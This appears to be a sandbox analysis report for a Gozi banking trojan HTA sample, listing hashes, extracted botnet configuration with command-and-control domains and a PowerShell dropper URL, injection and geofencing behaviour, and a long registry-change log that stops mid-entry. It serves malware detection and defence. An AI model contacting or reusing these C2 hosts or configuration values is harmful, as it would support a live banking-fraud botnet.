gozi | 4380de3cba18880ef72d2bc73ec84ee6f9f27b55d635a81ab8d40d488f59303d

Analysis

max time kernel
150s
max time network
132s
platform
windows10-2004_x64
resource
win10v2004-20230915-en
resource tags

arch:x64arch:x86image:win10v2004-20230915-enlocale:en-usos:windows10-2004-x64system
submitted
06-10-2023 12:16

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

client_1.hta
Size

22KB
MD5

57d3eb665f1e9e6a19f278baabd49e7b
SHA1

44566a9d716e6abd0304544dd88d245fea990882
SHA256

4380de3cba18880ef72d2bc73ec84ee6f9f27b55d635a81ab8d40d488f59303d
SHA512

30a0a3349aa0b815728abdb0c770d65354cdcf68ca939de4c175bdb285e3d664d7afdddc4be91bae170a65e4f808e6de7cc877fa36442f64f7b7db993e83851d
SSDEEP

384:rO6BO5aa8mOFhyS1q5H8qxAt4VFhmqmfW9PW6vN1v35Zh5LaBY5E6bqBdOfF:4zS0kPWVN5LbtcOfF

Score

10^/10

gozi 5050 banker isfb trojan

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://communicalink.com/index.php

Extracted

Family

gozi

Extracted

Family

gozi

Botnet

5050

mifrutty.com

Attributes

base_path
/jerry/
build
250260
exe_type
loader
extension
.bob
server_id
50

rsa_pubkey.plain

aes.plain

Extracted

Family

gozi

Botnet

5050

mifrutty.com

systemcheck.top

Attributes

base_path
/pictures/
build
250260
exe_type
worker
extension
.bob
server_id
50

rsa_pubkey.plain

aes.plain

Signatures

Gozi
Gozi is a well-known and widely distributed banking trojan.
banker trojan gozi
Blocklisted process makes network request 1 IoCs

Processes:

powershell.exe

flow pid process

36 3904 powershell.exe

flow	pid	process
36	3904	powershell.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

mshta.exemshta.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-2890696111-2332180956-3312704074-1000\Control Panel\International\Geo\Nation	mshta.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2890696111-2332180956-3312704074-1000\Control Panel\International\Geo\Nation	mshta.exe

Executes dropped EXE 1 IoCs

Processes:

PvlFbNwL.exe

pid process

1292 PvlFbNwL.exe

pid	process
1292	PvlFbNwL.exe

Suspicious use of SetThreadContext 8 IoCs

Processes:

powershell.exeExplorer.EXEcmd.exe

description	pid	process	target process
PID 4540 set thread context of 3152	4540	powershell.exe	Explorer.EXE
PID 3152 set thread context of 3832	3152	Explorer.EXE	RuntimeBroker.exe
PID 3152 set thread context of 4040	3152	Explorer.EXE	RuntimeBroker.exe
PID 3152 set thread context of 4636	3152	Explorer.EXE	RuntimeBroker.exe
PID 3152 set thread context of 976	3152	Explorer.EXE	RuntimeBroker.exe
PID 3152 set thread context of 428	3152	Explorer.EXE	cmd.exe
PID 3152 set thread context of 2632	3152	Explorer.EXE	cmd.exe
PID 428 set thread context of 2144	428	cmd.exe	PING.EXE

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Program crash 1 IoCs

Processes:

WerFault.exe

pid pid_target process target process

340 1292 WerFault.exe PvlFbNwL.exe

pid	pid_target	process	target process
340	1292	WerFault.exe	PvlFbNwL.exe

Modifies registry class 64 IoCs

Processes:

RuntimeBroker.exe

description	ioc	process
Set value (int)	\REGISTRY\USER\S-1-5-21-2890696111-2332180956-3312704074-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\3e1cb16e-fa90-42b8 = "0"	RuntimeBroker.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2890696111-2332180956-3312704074-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\8e2c9c5d-b5d8-4447 = a3ab3a394ff8d901	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2890696111-2332180956-3312704074-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\ccf1ed27-012c-4c6d	RuntimeBroker.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2890696111-2332180956-3312704074-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\956982ca-e1c9-4f96 = 0114020000000000c0000000000000464c0000000114020000000000c0000000000000468300000020000000242802394ff8d901242802394ff8d901242802394ff8d901000000000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad01320000000000465751622000386439316137643631313339306534316330656334356464326631653562303666336237316266636662306565626239323064646230643838363062613835630000b20009000400efbe46575162465751622e00000000000000000000000000000000000000000000000000dc20cb00380064003900310061003700640036003100310033003900300065003400310063003000650063003400350064006400320066003100650035006200300036006600330062003700310062006600630066006200300065006500620062003900320030006400640062003000640038003800360030006200610038003500630000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea0000001800000003000000455bb1de1000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c38643931613764363131333930653431633065633435646432663165356230366633623731626663666230656562623932306464623064383836306261383563000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a0580000000000000062716e646c656b670000000000000000fea4c51ffbcbda499cb9a8f99fb76322127a0ff79953ee11b0c5feedb4a4667efea4c51ffbcbda499cb9a8f99fb76322127a0ff79953ee11b0c5feedb4a4667ed2000000090000a08d00000031535053e28a5846bc4c3843bbfc139326986dce7100000004000000001f0000002f00000053002d0031002d0035002d00320031002d0032003800390030003600390036003100310031002d0032003300330032003100380030003900350036002d0033003300310032003700300034003000370034002d00310030003000300000000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d0000006800000000480000001e27da6a000000000000d01200000000000000000000000000000000	RuntimeBroker.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2890696111-2332180956-3312704074-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\9dc47d8f-2a2b-48a8 = "8324"	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2890696111-2332180956-3312704074-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\ebf0e47c-ecc7-4f73 = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy"	RuntimeBroker.exe
Key created	\REGISTRY\USER\S-1-5-21-2890696111-2332180956-3312704074-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\97979fc6-d56e-4568	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2890696111-2332180956-3312704074-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\892e0bc0-8529-4e35 = "\\\\?\\Volume{6ADA271E-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\73253cbf272a62f9f54d04ca29e156342ff23b6e55a5bca252f8d2ae4c86dab6"	RuntimeBroker.exe
Key deleted	\REGISTRY\USER\S-1-5-21-2890696111-2332180956-3312704074-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\7ea4114f-5e5a-4348	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2890696111-2332180956-3312704074-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\3e1cb16e-fa90-42b8	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2890696111-2332180956-3312704074-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\9dc47d8f-2a2b-48a8 = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy"	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2890696111-2332180956-3312704074-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\25ab23cf-f850-4f3e	RuntimeBroker.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2890696111-2332180956-3312704074-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\25ab23cf-f850-4f3e = "0"	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2890696111-2332180956-3312704074-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\892e0bc0-8529-4e35 = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy"	RuntimeBroker.exe
Key deleted	\REGISTRY\USER\S-1-5-21-2890696111-2332180956-3312704074-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\956982ca-e1c9-4f96	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2890696111-2332180956-3312704074-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\956982ca-e1c9-4f96 = "\\\\?\\Volume{6ADA271E-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\8d91a7d611390e41c0ec45dd2f1e5b06f3b71bfcfb0eebb920ddb0d8860ba85c"	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2890696111-2332180956-3312704074-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\7ea4114f-5e5a-4348 = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy"	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2890696111-2332180956-3312704074-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\3e1cb16e-fa90-42b8 = "\\\\?\\Volume{6ADA271E-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\e38fecc6849885d7f356435effabe0d0ccfeb17be4085b3c966768b44421ab2f"	RuntimeBroker.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2890696111-2332180956-3312704074-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\25ab23cf-f850-4f3e = 0114020000000000c0000000000000464c0000000114020000000000c0000000000000468300000020000000bc829f394ff8d901cfa7e4394ff8d901cfa7e4394ff8d901b03505000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad01320000000000465751622000653338666563633638343938383564376633353634333565666661626530643063636665623137626534303835623363393636373638623434343231616232660000b20009000400efbe46575162465751622e00000000000000000000000000000000000000000000000000ae0e9900650033003800660065006300630036003800340039003800380035006400370066003300350036003400330035006500660066006100620065003000640030006300630066006500620031003700620065003400300038003500620033006300390036003600370036003800620034003400340032003100610062003200660000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea0000001800000003000000455bb1de1000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c65333866656363363834393838356437663335363433356566666162653064306363666562313762653430383562336339363637363862343434323161623266000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a0580000000000000062716e646c656b670000000000000000fea4c51ffbcbda499cb9a8f99fb763221b7a0ff79953ee11b0c5feedb4a4667efea4c51ffbcbda499cb9a8f99fb763221b7a0ff79953ee11b0c5feedb4a4667ed2000000090000a08d00000031535053e28a5846bc4c3843bbfc139326986dce7100000004000000001f0000002f00000053002d0031002d0035002d00320031002d0032003800390030003600390036003100310031002d0032003300330032003100380030003900350036002d0033003300310032003700300034003000370034002d00310030003000300000000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d0000006800000000480000001e27da6a000000000000d01200000000000000000000000000000000	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2890696111-2332180956-3312704074-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\25ab23cf-f850-4f3e = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy"	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2890696111-2332180956-3312704074-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\97979fc6-d56e-4568	RuntimeBroker.exe
Key deleted	\REGISTRY\USER\S-1-5-21-2890696111-2332180956-3312704074-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\8e2c9c5d-b5d8-4447	RuntimeBroker.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2890696111-2332180956-3312704074-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\ccf1ed27-012c-4c6d = "0"	RuntimeBroker.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2890696111-2332180956-3312704074-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\ccf1ed27-012c-4c6d = 0114020000000000c0000000000000464c0000000114020000000000c0000000000000468300000020000000685d79394ff8d901f347c3394ff8d901f347c3394ff8d901b89a02000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad01320000000000465751622000386439316137643631313339306534316330656334356464326631653562303666336237316266636662306565626239323064646230643838363062613835630000b20009000400efbe46575162465751622e00000000000000000000000000000000000000000000000000dc20cb00380064003900310061003700640036003100310033003900300065003400310063003000650063003400350064006400320066003100650035006200300036006600330062003700310062006600630066006200300065006500620062003900320030006400640062003000640038003800360030006200610038003500630000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea0000001800000003000000455bb1de1000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c38643931613764363131333930653431633065633435646432663165356230366633623731626663666230656562623932306464623064383836306261383563000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a0580000000000000062716e646c656b670000000000000000fea4c51ffbcbda499cb9a8f99fb76322197a0ff79953ee11b0c5feedb4a4667efea4c51ffbcbda499cb9a8f99fb76322197a0ff79953ee11b0c5feedb4a4667ed2000000090000a08d00000031535053e28a5846bc4c3843bbfc139326986dce7100000004000000001f0000002f00000053002d0031002d0035002d00320031002d0032003800390030003600390036003100310031002d0032003300330032003100380030003900350036002d0033003300310032003700300034003000370034002d00310030003000300000000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d0000006800000000480000001e27da6a000000000000d01200000000000000000000000000000000	RuntimeBroker.exe
Key created	\REGISTRY\USER\S-1-5-21-2890696111-2332180956-3312704074-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\ebf0e47c-ecc7-4f73	RuntimeBroker.exe
Key created	\REGISTRY\USER\S-1-5-21-2890696111-2332180956-3312704074-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\25ab23cf-f850-4f3e	RuntimeBroker.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2890696111-2332180956-3312704074-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\8e2c9c5d-b5d8-4447 = "8324"	RuntimeBroker.exe
Key created	\REGISTRY\USER\S-1-5-21-2890696111-2332180956-3312704074-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\9dc47d8f-2a2b-48a8	RuntimeBroker.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2890696111-2332180956-3312704074-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\9dc47d8f-2a2b-48a8 = 2e5f3f394ff8d901	RuntimeBroker.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2890696111-2332180956-3312704074-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\ebf0e47c-ecc7-4f73 = d7ac1f3a4ff8d901	RuntimeBroker.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2890696111-2332180956-3312704074-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\4e11755e-2af8-4996 = "8324"	RuntimeBroker.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2890696111-2332180956-3312704074-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\4e11755e-2af8-4996 = 0114020000000000c0000000000000464c0000000114020000000000c0000000000000468300000020000000cdb02a394ff8d901cdb02a394ff8d901cdb02a394ff8d901000000000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad01320000000000465751622000623766303332323432373261316137343462383931346165313139613862313263316564313263323836643939383331613364333638336565306136376130660000b20009000400efbe46575162465751622e000000000000000000000000000000000000000000000000003398a200620037006600300033003200320034003200370032006100310061003700340034006200380039003100340061006500310031003900610038006200310032006300310065006400310032006300320038003600640039003900380033003100610033006400330036003800330065006500300061003600370061003000660000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea0000001800000003000000455bb1de1000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c62376630333232343237326131613734346238393134616531313961386231326331656431326332383664393938333161336433363833656530613637613066000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a0580000000000000062716e646c656b670000000000000000fea4c51ffbcbda499cb9a8f99fb76322147a0ff79953ee11b0c5feedb4a4667efea4c51ffbcbda499cb9a8f99fb76322147a0ff79953ee11b0c5feedb4a4667ed2000000090000a08d00000031535053e28a5846bc4c3843bbfc139326986dce7100000004000000001f0000002f00000053002d0031002d0035002d00320031002d0032003800390030003600390036003100310031002d0032003300330032003100380030003900350036002d0033003300310032003700300034003000370034002d00310030003000300000000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d0000006800000000480000001e27da6a000000000000d01200000000000000000000000000000000	RuntimeBroker.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2890696111-2332180956-3312704074-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\3e1cb16e-fa90-42b8 = "8324"	RuntimeBroker.exe
Key created	\REGISTRY\USER\S-1-5-21-2890696111-2332180956-3312704074-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\8e2c9c5d-b5d8-4447	RuntimeBroker.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2890696111-2332180956-3312704074-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\ebf0e47c-ecc7-4f73 = 